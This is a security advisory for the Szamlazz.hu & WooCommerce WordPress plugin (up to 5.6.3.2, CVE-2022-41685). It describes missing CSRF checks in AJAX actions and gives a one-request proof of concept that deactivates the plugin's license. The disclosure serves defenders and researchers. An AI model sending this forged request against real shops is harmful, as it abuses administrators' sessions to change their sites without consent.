Integration for Szamlazz.hu & WooCommerce by Viszt Péter

Integration for Szamlazz.hu & WooCommerce by Viszt Péter <= 5.6.3.2 - CSRF

LANACOMMONVDB ID: 13eb8d03-1aa9-47df-b2ed-568eae28f644

The plugin is lacking Cross-Site Request Forgery (CSRF) check in various AJAX actions, which could allow attackers to make logged in Shop Managers and above perform unwanted actions, such as deactivate the plugin’s license.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=wc_szamlazz_license_deactivate

References

Source Code: https://wordpress.org/plugins/integration-for-szamlazzhu-woocommerce/

CVE: CVE-2022-41685

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-07

Published: 2022-10-20

Affected Version: <= 5.6.3.2

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]